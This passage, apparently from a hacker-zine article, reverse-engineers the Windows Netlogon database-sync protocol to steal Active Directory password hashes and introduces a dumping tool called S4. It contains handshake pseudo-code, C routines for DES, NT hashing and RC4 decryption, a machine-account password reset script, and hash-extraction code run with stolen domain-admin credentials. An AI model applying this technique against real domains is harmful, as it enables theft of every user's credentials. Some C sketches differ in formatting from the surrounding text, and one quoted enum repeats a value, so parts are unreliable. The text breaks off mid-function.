|
-> lsa_QueryInfoPolicy2 (opnum 46)
|
|
3. MEDIA binding on \\DC3.FOO.BAR\IPC$\netlogon and calling
|
|
-> NetrServerReqChallenge (opnum 4)
|
|
-> NetrServerAuthenticate2 (opnum 15)
|
|
4. MEDIA binding again (*) on \\DC3.FOO.BAR\IPC$\netlogon and calling
|
|
-> NetrDatabaseSync (opnum 8)
|
|
-> NetrDatabaseSync (opnum 8)
|
|
-> NetrDatabaseSync (opnum 8)
|
|
|
|
(* Using 2 different binds in step 3 & 4 seems weird at first but it will
|
|
be explained later.)
|
|
|
|
I was immediately interested in the NetrDatabaseSync() function and googled
|
|
a bit to see if I could find some documentation. Fortunately, Microsoft
|
|
documents this function; it is a wrapper of NetrDatabaseSync2() [05].
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
NTSTATUS NetrDatabaseSync2(
|
|
[in, string] LOGONSRV_HANDLE PrimaryName,
|
|
[in, string] wchar_t* ComputerName,
|
|
[in] PNETLOGON_AUTHENTICATOR Authenticator,
|
|
[in, out] PNETLOGON_AUTHENTICATOR ReturnAuthenticator,
|
|
[in] DWORD DatabaseID,
|
|
[in] SYNC_STATE RestartState,
|
|
[in, out] unsigned long* SyncContext,
|
|
[out] PNETLOGON_DELTA_ENUM_ARRAY* DeltaArray,
|
|
[in] DWORD PreferredMaximumLength
|
|
);
|
|
[...]
|
|
The NetrDatabaseSync2 method returns a set of all changes applied to the
|
|
specified database since its creation. It provides an interface for a BDC
|
|
to fully synchronize its databases to those of the PDC.
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
So, it seemed safe to assume that the network traffic observed was the
|
|
consequence of a synchronization mechanism. If you're familiar with Windows
|
|
networks then there is something that should immediately draw your
|
|
attention: the documentation is mentioning PDC (Primary Domain Controller)
|
|
& BDC (Backup Domain Controller) which are pre-Windows2000 (= NT4)
|
|
concepts. Indeed, Windows 2000 introduced Active Directory which uses a
|
|
different logic. Wikipedia [06] explains it perfectly:
|
|
|
|
-----------------[ Wikipedia: Primary Domain Controller ]------------------
|
|
In later releases of Windows, domains have been supplemented by the use of
|
|
Active Directory services. In Active Directory domains, the concept of
|
|
primary and secondary domain controller relationships no longer applies.
|
|
Primary domain controller emulators hold the accounts databases and
|
|
administrative tools. [...] The same rules apply; only one PDC may exist on
|
|
a domain, but multiple replication servers may still be used.
|
|
---------------------------------------------------------------------------
|
|
|
|
Note: "later releases" means Windows 2000 or above.
|
|
|
|
So I came up with the conclusion that Samba 4 was (and still is) using an
|
|
old -now emulated- mechanism to synchronize the AD database between its
|
|
DCs. More precisely in Active Directory, a unique DC holds the PDC FSMO
|
|
role [12], the other DCs being (emulated) BDC as a result. Now pay
|
|
attention to the "DatabaseID" parameter passed to NetrDatabaseSync2():
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
DatabaseID: The identifier for a specific database for which the changes
|
|
are requested. It MUST be one of the following values.
|
|
|
|
Value Meaning
|
|
----- -------
|
|
|
|
0x00000000 Indicates the SAM database.
|
|
0x00000001 Indicates the SAM built-in database.
|
|
0x00000002 Indicates the LSA database.
|
|
---------------------------------------------------------------------------
|
|
|
|
Assuming an attacker could call NetrDatabaseSync2() with DatabaseID=0 from
|
|
an (emulated) BDC (= a compromised DC), then he would likely be able to
|
|
retrieve the user database (SAM), which should include hashed passwords as
|
|
well, right?
|
|
|
|
I was very suspicious at first because the documentation wasn't mentioning
|
|
anything about the LSA queries and lsa_QueryInfoPolicy2() is still
|
|
currently undocumented (afaik). I was afraid that this would complicate
|
|
things. I could have started to dig inside Samba 4's code (which is quite
|
|
messy unfortunately) but I had instead a much better idea. What if this API
|
|
was implemented in some native program available with Windows Server?
|
|
|
|
Guess the answer.
|
|
|
|
|
|
---[ 4 - Digging into the Netlogon replication mechanism
|
|
|
|
|
|
If you're familiar with Windows sysadmin stuff then you must be well aware
|
|
of the "Remote Server Administration Tools" [07] which provides a set of
|
|
useful new commands for the CLI, including the one I was looking for:
|
|
nltest.exe (now native under Windows 2008 FYI).
|
|
|
|
Here is how Microsoft describes the tool:
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
You can use nltest to:
|
|
|
|
Get a list of domain controllers
|
|
|
|
Force a remote shutdown
|
|
|
|
Query the status of trust
|
|
|
|
Test trust relationships and the state of domain controller replication
|
|
in a Windows domain
|
|
|
|
Force a user-account database to synchronize on Windows NT version 4.0
|
|
or earlier domain controllers <-- synchronize + NT4 == JACKPOT?
|
|
---------------------------------------------------------------------------
|
|
|
|
The last sentence is interesting, right?
|
|
|
|
Looking at the IAT of nltest.exe (for Windows 2003), I saw that there were
|
|
entries for I_NetServerReqChallenge(), I_NetServerAuthenticate() and
|
|
I_NetDatabaseSync(), all of them being imported from NETAPI32.dll and
|
|
(strangely) undocumented.
|
|
|
|
A short look at them convinced me that they were mere wrappers for RPC
|
|
calls to (respectively) NetrServerReqChallenge(), NetrServerAuthenticate()
|
|
and NetrDatabaseSync() located in netlogon.dll and obviously called using a
|
|
binding to the named pipe \\%COMPUTERNAME%\IPC$\netlogon. What's cool with
|
|
these functions is that they _are_ documented in [08] and a tiny
|
|
modification apart, their prototypes match those of their NETAPI32.dll
|
|
cousins.
|
|
|
|
To make things even easier, I observed that all our targeted functions were
|
|
called inside one big function, arbitrarily called SyncFunction() from now
|
|
on. Reversing SyncFunction() was a task which proved to be really easy
|
|
thanks to Microsoft's API documentation.
|
|
|
|
Assuming DC2 requests a synchronization from its PDC (DC1), this gives the
|
|
approximate pseudo-code (I omitted details about the assembly for
|
|
clarification purposes, but you can find them in the uuencoded C code at
|
|
the end of the article):
|
|
|
|
-----------------------------[ SyncFunction() ]----------------------------
|
|
|
|
# Step 1:
|
|
# ClientChallenge is an 8 bytes array randomly chosen
|
|
|
|
RANDOM(ClientChallenge);
|
|
|
|
# Step 2:
|
|
# DC2 sends its challenge and requests one (also an 8 bytes array)
|
|
# from DC1
|
|
|
|
ZERO(ServerChallenge);
|
|
I_NetReqChallengeFunc(
|
|
(WCHAR) L"\\\\" + DC1_FQDN,
|
|
(WCHAR) DC2_HOSTNAME,
|
|
ClientChallenge,
|
|
[OUT] ServerChallenge);
|
|
|
|
# Step 3:
|
|
# The client creates a Unicode object out of its machine account name
|
|
# (suffix is '$') and hashes it using SystemFunction007() which is an
|
|
# MD4()
|
|
# The resulting hash (NTLM) is a 16 bytes array: MD4_HASH
|
|
|
|
UnicodeString(ComputerName, "DC2$")
|
|
ZERO(MD4_HASH);
|
|
SystemFunction007((UnicodeString)ComputerName, MD4_HASH);
|
|
|
|
# Step 4:
|
|
# To authenticate itself, the client will need to compute a new
|
|
# challenge (NewClientChallenge).
|
|
# To do so, the client builds a DES key (SessionKey) using the two
|
|
# challenges and the previously computed hash.
|
|
|
|
ZERO(SessionKey, 16);
|
|
NlMakeSessionKey(
|
|
MD4_HASH,
|
|
ClientChallenge,
|
|
ServerChallenge,
|
|
[OUT] SessionKey);
|
|
|
|
# Step 5:
|
|
# The client computes NewClientChallenge using SessionKey.
|
|
|
|
Encrypt000(
|
|
ClientChallenge,
|
|
[OUT] NewClientChallenge,
|
|
SessionKey);
|
|
|
|
# Step 6:
|
|
# The client sends NewClientChallenge to authenticate itself.
|
|
# If the answer is the correct one, the server will acknowledge
|
|
# the identity of the client and gives him back his own challenge
|
|
# (NewServerChallenge)
|
|
|
|
ZERO(NewServerChallenge);
|
|
I_NetServerAuthenticate(
|
|
(WCHAR) L"\\\\" + DC1_FQDN,
|
|
L"DC2$", # DC2's machine account name
|
|
ServerSecureChannel = 6,
|
|
(WCHAR) L"DC2", # DC2's hostname
|
|
NewClientChallenge,
|
|
[OUT] NewServerChallenge,
|
|
NegotiateFlags);
|
|
|
|
# Step 7:
|
|
# The client needs to know that he can trust the server so the
|
|
# authentication has to be _mutual_. Imagine if a rogue DC was sending
|
|
# a false SAM, this would allow an attacker to authenticate himself on
|
|
# DC2 using spoofed credentials.
|
|
#
|
|
# To check the identity of the server, NewServerChallenge must have
|
|
# been calculated using ServerChallenge and SessionKey which is common
|
|
# to DC1 and DC2.
|
|
|
|
Encrypt000(
|
|
ServerChallenge,
|
|
[OUT] ExpectedKey,
|
|
SessionKey);
|
|
|
|
if( NewServerChallenge != ExpectedKey )
|
|
{
|
|
exit(1);
|
|
}
|
|
|
|
# Step 8:
|
|
# For each type of database (DatabaseID), DC2 computes a new challenge
|
|
# which is stored in Authenticator and retrieves the database object
|
|
# DeltaArray. After each call, the client checks the authenticity of
|
|
# the data returned.
|
|
|
|
for(DatabaseID=0; DatabaseID<3; DatabaseID++)
|
|
{
|
|
NlBuildAuthenticator(
|
|
NewClientChallenge,
|
|
SessionKey,
|
|
[OUT] Authenticator);
|
|
|
|
ZERO(ReturnAuthenticator);
|
|
I_NetDatabaseSync(
|
|
(WCHAR) L"\\\\" + DC1_FQDN,
|
|
(WCHAR) DC2_HOSTNAME,
|
|
Authenticator,
|
|
ReturnAuthenticator,
|
|
DatabaseID,
|
|
SyncContext=0,
|
|
[OUT] DeltaArray,
|
|
-1);
|
|
|
|
if( NlUpdateSeed(
|
|
NewClientChallenge,
|
|
ReturnAuthenticator,
|
|
SessionKey) == 0 )
|
|
{
|
|
exit(1);
|
|
}
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
With the additional functions:
|
|
|
|
-----------------------------[ subfunctions ]------------------------------
|
|
|
|
# This function uses the first 14 bytes of SessionKey to compute
|
|
# a new challenge out of an old one. Both challenges are 8 bytes
|
|
# arrays.
|
|
#
|
|
# new = DES(DES(old))
|
|
|
|
|
|
Encrypt000(
|
|
ClientChallenge,
|
|
NewChallenge,
|
|
SessionKey)
|
|
{
|
|
BYTE TempOutput[8];
|
|
|
|
ZERO(NewChallenge);
|
|
SystemFunction001(ClientChallenge, SessionKey[0..6], TempOutput);
|
|
SystemFunction001(TempOutput, SessionKey[7..13], NewChallenge);
|
|
|
|
# TempOutput = DES(in=ClientChallenge, k=SessionKey[0..6])
|
|
# NewChallenge = DES(in=TempOutput, k=SessionKey[7..13])
|
|
}
|
|
|
|
---
|
|
|
|
# The SessionKey is calculated using a combination of ClientChallenge
|
|
# and ServerChallenge (to avoid replay attacks I believe).
|
|
# Because client & server both know the MD4 value (a shared key between
|
|
# them), they both can compute safely the SessionKey, but an attacker
|
|
# without this knowledge will be unable to.
|
|
|
|
NlMakeSessionKey(
|
|
MD4,
|
|
ClientChallenge,
|
|
ServerChallenge,
|
|
SessionKey)
|
|
{
|
|
BYTE TempOut[8];
|
|
|
|
ZERO(SessionKey)
|
|
SessionKey[0..3] = ClientChallenge[0..3] + ServerChallenge[0..3];
|
|
SessionKey[4..7] = ClientChallenge[4..7] + ServerChallenge[4..7];
|
|
|
|
SystemFunction001(SessionKey[0..7], MD4[0..6], TempOut);
|
|
SystemFunction001(TempOut, MD4[9..15], SessionKey);
|
|
|
|
# TempOut = DES(SessionKey[0..7], MD4[0..6])
|
|
# SessionKey = DES(TempOut, MD4[9..15])
|
|
}
|
|
|
|
---
|
|
|
|
# This function builds the Authenticator necessary for each
|
|
# *DatabaseSync() call. The authenticator includes a Timestamp which is
|
|
# used in the computation of the new Challenge.
|
|
|
|
NlBuildAuthenticator(
|
|
NewClientChallenge,
|
|
SessionKey,
|
|
Authenticator
|
|
)
|
|
{
|
|
FILETIME Time;
|
|
ZERO(Authenticator);
|
|
GetSystemTimeAsFileTime(Time);
|
|
RtlTimeToSecondsSince1970(
|
|
Time,
|
|
Authenticator->Timestamp);
|
|
NewClientChallenge[0..3] += Authenticator->Timestamp;
|
|
Encrypt000(
|
|
NewClientChallenge,
|
|
Authenticator->Credential,
|
|
SessionKey);
|
|
}
|
|
|
|
---
|
|
|
|
# The server is supposed to acknowledge securely the request.
|
|
# This function checks that the acknowledgment is indeed from
|
|
# the server and not from some rogue DC.
|
|
|
|
NlUpdateSeed(
|
|
NewClientChallenge,
|
|
ReturnAuthenticator,
|
|
SessionKey
|
|
)
|
|
{
|
|
BYTE TempOut[8];
|
|
|
|
NewClientChallenge[0]++;
|
|
Encrypt000(
|
|
NewClientChallenge,
|
|
TempOut,
|
|
SessionKey);
|
|
|
|
if( ReturnAuthenticator->Credential == TempOut )
|
|
return 1;
|
|
|
|
return 0;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
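As a side note, SystemFunction001() is essentially single-block DES in ECB
mode keyed with 7 bytes (advapi32 expands them into a 64-bit DES key
internally). If you want to replay the challenge arithmetic offline, here is
a minimal sketch of Encrypt000(), assuming OpenSSL's legacy DES API; the
helper names are mine, not Microsoft's:

-------------------------[ sketch: Encrypt000 in C ]------------------------
/* Offline sketch of Encrypt000() (see pseudo-code above).
 * Assumption: OpenSSL's legacy DES API (link with -lcrypto). */
#include <string.h>
#include <openssl/des.h>

/* Expand a 7 bytes string into an 8 bytes DES key with parity bits */
static void str_to_key(const unsigned char *s, DES_cblock *key)
{
    unsigned char *k = (unsigned char *)key;
    int i;

    k[0] = s[0] >> 1;
    k[1] = ((s[0] & 0x01) << 6) | (s[1] >> 2);
    k[2] = ((s[1] & 0x03) << 5) | (s[2] >> 3);
    k[3] = ((s[2] & 0x07) << 4) | (s[3] >> 4);
    k[4] = ((s[3] & 0x0F) << 3) | (s[4] >> 5);
    k[5] = ((s[4] & 0x1F) << 2) | (s[5] >> 6);
    k[6] = ((s[5] & 0x3F) << 1) | (s[6] >> 7);
    k[7] = s[6] & 0x7F;
    for (i = 0; i < 8; i++)
        k[i] <<= 1;
    DES_set_odd_parity(key);
}

/* SystemFunction001(in, key7, out): out = DES(in, key7) */
static void sysfunc001(const unsigned char *in8, const unsigned char *key7,
                       unsigned char *out8)
{
    DES_cblock key;
    DES_key_schedule ks;

    str_to_key(key7, &key);
    DES_set_key_unchecked((const_DES_cblock *)&key, &ks);
    DES_ecb_encrypt((const_DES_cblock *)in8, (DES_cblock *)out8, &ks,
                    DES_ENCRYPT);
}

/* Encrypt000(old, new, SK): new = DES(DES(old, SK[0..6]), SK[7..13]) */
static void encrypt000(const unsigned char *old8, unsigned char *new8,
                       const unsigned char *sk)
{
    unsigned char tmp[8];

    sysfunc001(old8, sk, tmp);
    sysfunc001(tmp, sk + 7, new8);
}
---------------------------------------------------------------------------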
|
|
Let's put aside the usual Microsoft crypto weirdness of the protocol
|
|
because this is not the subject of this article. In a nutshell:
|
|
|
|
- The client (BDC) and the server (PDC) both compute a session key
|
|
using random challenges (to avoid replay attacks) and a 'secret' MD4
|
|
key.
|
|
- Once a trusted bond between them is established, the server sends
|
|
several objects (of type DeltaArray) which should contain the
|
|
expected secrets. The trusted bond is called a 'secure channel' in
|
|
Microsoft's documentation.
|
|
- To avoid man-in-the-middle attempts, the exchanges are somehow
|
|
authenticated using the session key (which has another purpose, but
|
|
that's another story my friends).
|
|
|
|
Now, if you have been attentive you may have realized that I never
|
|
mentioned any LSA related functions (remember lsarpc bind?) and that the
|
|
session key would be really easy to deduce for a passive observer (sniffer)
|
|
because the shared secret (%BDC_NAME% + "$") is predictable. And indeed, it
|
|
didn't work when I first tested the code built upon the reverse engineering
|
|
process. I_NetServerAuthenticate() kicked me out with the classical "Access
|
|
Denied" message.
|
|
|
|
So what went wrong? I was almost sure that the lsa_() functions were not
|
|
necessary because they are not used in nltest.exe. So this led me to think
|
|
that somehow NewClientChallenge wasn't correct. Assuming the algorithm was
|
|
well reversed, the session key produced by NlMakeSessionKey() had to be
|
|
erroneous. Strange? Not quite. Remember that the MD4 key is somehow weird.
|
|
Even considering Microsoft's past, it was hard to believe that they would
|
|
base the security of their protocol on such a value. And indeed they aren't
|
|
that crazy! Using the appropriate hook in LSASS, I found out that this MD4
|
|
was in fact the client's computer account hash (NTLM)! A result that I
|
|
would later find almost everywhere whenever looking for some information on
|
|
the so-called 'secure channel'. Sometimes you just have to keep looking...
|
|
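For clarity, this computer account 'NTLM' is nothing exotic: it is the NT
hash of the machine account's password, i.e. MD4 over the UTF-16LE encoded
password, which is what SystemFunction007() computes when fed the password
instead of the account name. A minimal sketch, assuming OpenSSL's legacy
MD4() (the helper name is mine):

--------------------------[ sketch: NT hash in C ]--------------------------
/* NT hash = MD4(UTF-16LE(password)). Sketch only; assumes OpenSSL's
 * legacy MD4() is available (link with -lcrypto). */
#include <string.h>
#include <openssl/md4.h>

static void nt_hash(const char *password, unsigned char md4[16])
{
    unsigned char utf16[512];
    size_t i, len = strlen(password);

    /* naive ASCII -> UTF-16LE conversion, enough for a password we chose */
    for (i = 0; i < len && i < sizeof(utf16) / 2; i++) {
        utf16[2 * i]     = (unsigned char)password[i];
        utf16[2 * i + 1] = 0x00;
    }
    MD4(utf16, 2 * i, md4);
}
---------------------------------------------------------------------------

Keep this helper in mind: it becomes handy a few paragraphs below, once the
machine account password has been reset to a value we know.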
|
|
The problem is that retrieving the BDC's computer account NTLM is
|
|
(probably) as hard as retrieving the whole SAM itself. So how do we deal
|
|
with the Ouroboros? The solution is actually quite simple: we may not know
|
|
the NTLM hash, but we can easily change it! Look at this nice piece of
|
|
code:
|
|
|
|
-------------------------------[ passwd.vbs ]------------------------------
|
|
Dim objComputer
|
|
|
|
Set objComputer = GetObject("WinNT://foo.bar/DC2$")
|
|
objComputer.SetPassword "dummy"
|
|
|
|
Wscript.Quit
|
|
---------------------------------------------------------------------------
|
|
|
|
Executing the VBS script on the 'BDC' is enough (remember that we own a
|
|
domain administrator account). The cool thing with this trick is that the
|
|
BDC will then synchronize its password with the 'PDC' for us. Cool trick
|
|
right? And this proved to be enough to have I_NetDatabaseSync()
|
|
successfully returning. In the tool that I wrote, I implemented it using
|
|
the IADsUser::SetPassword() method.
|
|
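For reference, here is a rough sketch of what such an IADsUser::SetPassword()
call can look like from C through ADSI (error handling stripped, the ADsPath
and password are the example values used above, and you will need
activeds.lib/adsiid.lib at link time):

---------------------[ sketch: machine password reset ]---------------------
/* Reset the BDC machine account password via ADSI, mirroring passwd.vbs.
 * Sketch only; the ADsPath and the new password are examples. */
#include <windows.h>
#include <iads.h>
#include <adshlp.h>

static HRESULT reset_machine_password(void)
{
    IADsUser *user = NULL;
    BSTR pwd = SysAllocString(L"dummy");
    HRESULT hr;

    CoInitialize(NULL);
    hr = ADsGetObject(L"WinNT://foo.bar/DC2$", &IID_IADsUser,
                      (void **)&user);
    if (SUCCEEDED(hr)) {
        hr = user->lpVtbl->SetPassword(user, pwd);
        user->lpVtbl->Release(user);
    }
    SysFreeString(pwd);
    CoUninitialize();
    return hr;
}
---------------------------------------------------------------------------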
|
|
>>>>>>>>>>>>>>>>>>
|
|
I was lucky with the nltest.exe analysis because I didn't use the Windows
|
|
2008 version. On Windows 2008 server, I_NetDatabaseSync() isn't used so it
|
|
would have forced me to reverse engineer Samba's C code which is far more
|
|
difficult believe me :-P
|
|
<<<<<<<<<<<<<<<<<<
|
|
|
|
|
|
---[ 5 - Extracting the secrets
|
|
|
|
|
|
Now that this part of the job is finished, we only need to know how to
|
|
parse the DeltaArray objects, something partially documented by Microsoft
|
|
[09]. nltest.exe doesn't perform this task (it only tests that the
|
|
synchronization is working and frees the DeltaArray objects that it
|
|
receives) but obviously samba-tool does.
|
|
|
|
|
|
-----[ 5.1 - Browsing samba-tool's source code
|
|
|
|
|
|
Everything starts in source4/samba_tool/samba_tool.c:
|
|
|
|
1. main() calls binary_net(), the main function
|
|
2. binary_net() then:
|
|
|
|
- Initializes the Python interpreter using Py_Initialize()
|
|
|
|
- Creates a dictionary out of the "samba.netcmd" module using
|
|
py_commands() which returns the Python object "commands". This
|
|
object is created in:
|
|
source4/scripting/python/samba/netcmd/__init__.py:
|
|
|
|
-------------------------------------------------------
|
|
commands = {}
|
|
from samba.netcmd.pwsettings import cmd_pwsettings
|
|
commands["pwsettings"] = cmd_pwsettings()
|
|
from samba.netcmd.domainlevel import cmd_domainlevel
|
|
commands["domainlevel"] = cmd_domainlevel()
|
|
from samba.netcmd.setpassword import cmd_setpassword
|
|
commands["setpassword"] = cmd_setpassword()
|
|
from samba.netcmd.newuser import cmd_newuser
|
|
commands["newuser"] = cmd_newuser()
|
|
from samba.netcmd.netacl import cmd_acl
|
|
[...]
|
|
-------------------------------------------------------
|
|
|
|
3. There are 3 possible situations:
|
|
|
|
- If argv[1] is handled by a Python module then commands[argv[1]]
|
|
is not void and the corresponding method is called.
|
|
|
|
- Else if argv[1] is in net_functable[] then a C function is
|
|
handling the command.
|
|
|
|
- Else argv[1] is not a legitimate command => error msg!
|
|
|
|
In the case of 'samdump', it is implemented in the C language by the
|
|
net_samdump() function available in source4/samba_tool/vampire.c. This
|
|
function calls libnet_SamSync_netlogon() (source4/libnet/libnet_samsync.c)
|
|
which:
|
|
|
|
- Establishes the secure channel
|
|
- Calls dcerpc_netr_DatabaseSync_r() 3 times (1 per DatabaseID value)
|
|
- Calls samsync_fix_delta() in (libcli/samsync/decrypt.c) which handles
|
|
the decryption (if required). Remember this function.
|
|
|
|
|
|
-----[ 5.2 - Understanding database changes
|
|
|
|
|
|
I_NetDatabaseSync() returns DeltaArray which is a NETLOGON_DELTA_ENUM_ARRAY
|
|
object. It's very well documented by Microsoft:
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
// http://msdn.microsoft.com/en-us/library/cc237083%28v=prot.13%29.aspx
|
|
typedef struct _NETLOGON_DELTA_ENUM_ARRAY {
|
|
DWORD CountReturned;
|
|
[size_is(CountReturned)] PNETLOGON_DELTA_ENUM Deltas;
|
|
} NETLOGON_DELTA_ENUM_ARRAY,
|
|
*PNETLOGON_DELTA_ENUM_ARRAY;
|
|
|
|
// http://msdn.microsoft.com/en-us/library/cc237082%28v=prot.13%29.aspx
|
|
typedef struct _NETLOGON_DELTA_ENUM {
|
|
NETLOGON_DELTA_TYPE DeltaType;
|
|
[switch_is(DeltaType)] NETLOGON_DELTA_ID_UNION DeltaID;
|
|
[switch_is(DeltaType)] NETLOGON_DELTA_UNION DeltaUnion;
|
|
} NETLOGON_DELTA_ENUM,
|
|
*PNETLOGON_DELTA_ENUM;
|
|
---------------------------------------------------------------------------
|
|
|
|
So basically DeltaArray is an array of NETLOGON_DELTA_ENUM objects.
|
|
Depending on their DeltaType field, the receiver will know how to parse
|
|
their internal fields (DeltaID and DeltaUnion). According to Microsoft,
|
|
DeltaType may take the following values:
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
// http://msdn.microsoft.com/en-us/library/cc237100%28v=prot.13%29.aspx
|
|
The NETLOGON_DELTA_TYPE enumeration defines an enumerated set of possible
|
|
database changes.
|
|
|
|
typedef enum _NETLOGON_DELTA_TYPE
|
|
{
|
|
AddOrChangeDomain = 1,
|
|
AddOrChangeGroup = 2,
|
|
DeleteGroup = 3,
|
|
RenameGroup = 4,
|
|
AddOrChangeUser = 5,
|
|
DeleteUser = 6,
|
|
RenameUser = 7,
|
|
ChangeGroupMembership = 8,
|
|
AddOrChangeAlias = 9,
|
|
DeleteAlias = 10,
|
|
RenameAlias = 11,
|
|
ChangeAliasMembership = 12,
|
|
AddOrChangeLsaPolicy = 13,
|
|
AddOrChangeLsaTDomain = 14,
|
|
DeleteLsaTDomain = 15,
|
|
AddOrChangeLsaAccount = 16,
|
|
DeleteLsaAccount = 17,
|
|
AddOrChangeLsaSecret = 18,
|
|
DeleteLsaSecret = 20,
|
|
DeleteGroupByName = 20,
|
|
DeleteUserByName = 21,
|
|
SerialNumberSkip = 22
|
|
} NETLOGON_DELTA_TYPE;
|
|
---------------------------------------------------------------------------
|
|
|
|
When dcerpc_netr_DatabaseSync_r() returns, samsync_fix_delta() is called
|
|
for each NETLOGON_DELTA_ENUM object. The source code of this function is
|
|
straightforward (libcli/samsync/decrypt.c):
|
|
|
|
--------------------------[ Samba 4 source code ]--------------------------
|
|
NTSTATUS samsync_fix_delta(TALLOC_CTX *mem_ctx,
|
|
struct netlogon_creds_CredentialState *creds,
|
|
enum netr_SamDatabaseID database_id,
|
|
struct netr_DELTA_ENUM *delta)
|
|
{
|
|
NTSTATUS status = NT_STATUS_OK;
|
|
|
|
switch (delta->delta_type) {
|
|
case NETR_DELTA_USER:
|
|
|
|
status = fix_user(mem_ctx,
|
|
creds,
|
|
database_id,
|
|
delta);
|
|
break;
|
|
case NETR_DELTA_SECRET:
|
|
|
|
status = fix_secret(mem_ctx,
|
|
creds,
|
|
database_id,
|
|
delta);
|
|
break;
|
|
default:
|
|
break;
|
|
}
|
|
|
|
return status;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
So to summarize, amongst all the NETLOGON_DELTA_ENUM that
|
|
I_NetDatabaseSync() provides us, the only important ones are those of type
|
|
AddOrChangeUser (NETR_DELTA_USER) and AddOrChangeLsaSecret
|
|
(NETR_DELTA_SECRET).
|
|
|
|
|
|
-----[ 5.3 - Retrieving the hashes
|
|
|
|
|
|
Because the subject of this paper is pwdump-like tools, we will only focus
|
|
our attention on the AddOrChangeUser type. Here is the code that I used to
|
|
extract the useful objects:
|
|
|
|
----------------------------[ S4 source code ]-----------------------------
|
|
PNETLOGON_DELTA_ENUM Deltas = DeltaArray->Deltas;
|
|
for(i=0; i<DeltaArray->CountReturned; i++)
|
|
{
|
|
|
|
#ifdef __debug__
|
|
if(Deltas->DeltaType == AddOrChangeLsaSecret)
|
|
{
|
|
[...]
|
|
}
|
|
#endif
|
|
|
|
if(Deltas->DeltaType == AddOrChangeUser)
|
|
{
|
|
PNETLOGON_DELTA_USER DUser;
|
|
DUser = (PNETLOGON_DELTA_USER)
|
|
Deltas->DeltaUnion.DeltaUser;
|
|
|
|
arcfour_crypt_blob(
|
|
DUser->PrivateData.Data,
|
|
DUser->PrivateData.DataLength,
|
|
SessionKey,
|
|
16);
|
|
[...]
|
|
}
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
The NETLOGON_DELTA_USER object holds information about a particular User
|
|
of the domain including its Username and (hashed) password. However
|
|
depending on the value of NtPasswordPresent and LmPasswordPresent, the
|
|
password may not be available in the EncryptedNtOwfPassword and
|
|
EncryptedLmOwfPassword fields of the structure. In this case, they are
|
|
stored instead in the PrivateData.Data buffer which is RC4 encrypted
|
|
using the SessionKey. Practically speaking, this last case is the only one
|
|
I've ever witnessed.
|
|
|
|
The PrivateData.Data buffer holds a copy of the information returned by
|
|
SamIGetPrivateData() which is a function called by pwdump6. The current
|
|
(and potentially former) hashed passwords are stored somehow in this buffer
|
|
and ripping the appropriate functions in the pwdump6 tool grants us the
|
|
Holy Grail. There is no need to explain what is already common knowledge in
|
|
the windows hacking world. Have a look at the DealWithDeltaArray()
|
|
function in my code if you have any questions.
|
|
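If you would rather not pull Samba's arcfour routine into a standalone tool,
RC4 is short enough to inline. A minimal sketch (the buffer is decrypted in
place with the 16 bytes session key):

-----------------------------[ sketch: RC4 in C ]---------------------------
/* In-place RC4, enough to decrypt PrivateData.Data with the session key. */
#include <stddef.h>

static void rc4_crypt(unsigned char *buf, size_t len,
                      const unsigned char *key, size_t keylen)
{
    unsigned char S[256], tmp;
    size_t i, j, k;

    for (i = 0; i < 256; i++)
        S[i] = (unsigned char)i;
    for (i = 0, j = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) & 0xff;
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
    }
    for (i = 0, j = 0, k = 0; k < len; k++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
        buf[k] ^= S[(S[i] + S[j]) & 0xff];
    }
}
---------------------------------------------------------------------------

Call it with (DUser->PrivateData.Data, DUser->PrivateData.DataLength,
SessionKey, 16) and you get the same result as the arcfour_crypt_blob() call
shown above.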
|
|
|
|
---[ 6 - A practical introduction to S4 (Stealth & Secure Secret Stealer)
|
|
|
|
|
|
All this work ultimately resulted in a single tool: S4 (courtesy of the
|
|
grateful p1ckp0ck3t to the Samba team ;]). I've chosen to release it under
|
|
the GPL because I certainly disliked the idea of the pigs from MSF
|
|
including it in their framework. That said, "let the hacking begin".
|
|
|
|
Context
|
|
+++++++
|
|
|
|
We have a CMD shell on some XP/Seven box part of the 'foo.bar' 2003 domain.
|
|
Somehow we also got our hands on the credentials of a domain administrator:
|
|
"Administrator / foo123"
|
|
|
|
Our goal is simple; we now want to extract the passwords from the AD.
|
|
|
|
Locating the PDC
|
|
++++++++++++++++
|
|
|
|
Retrieving the location of the DC is as easy as performing a DNS request on
|
|
the domain name (foo.bar). However the problems with this approach are
|
|
that:
|
|
- it gives DNS servers as well,
|
|
- it doesn't allow us to locate the PDC amongst the DCs.
|
|
|
|
Fortunately, the dsquery tool provides the information:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\Users\Administrator>dsquery server -hasfsmo PDC
|
|
"CN=DC3,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=
|
|
foo,DC=bar"
|
|
|
|
C:\Users\Administrator>
|
|
---------------------------------------------------------------------------
|
|
|
|
Now if for some reason this command isn't available, you can use the -D
|
|
option of S4 which is based on DsGetDomainControllerInfo().
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\Users\Administrator>S4.exe -D -d foo.bar
|
|
[> Discovery mode
|
|
- DC controller 0 is DC3.foo.bar [PDC]
|
|
- DC controller 1 is DC4.foo.bar
|
|
|
|
C:\Users\Administrator>
|
|
---------------------------------------------------------------------------
|
|
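For the record, the -D discovery mode boils down to one bind and one call; a
minimal sketch, assuming the documented level-2 DsGetDomainControllerInfo()
interface (link with ntdsapi.lib):

---------------------[ sketch: locating the PDC in C ]----------------------
/* Enumerate the DCs of a domain and flag the PDC, as S4 -D does.
 * Sketch only, error handling reduced to the bare minimum. */
#include <windows.h>
#include <ntdsapi.h>
#include <stdio.h>

static void list_dcs(const wchar_t *domain)
{
    HANDLE hDS = NULL;
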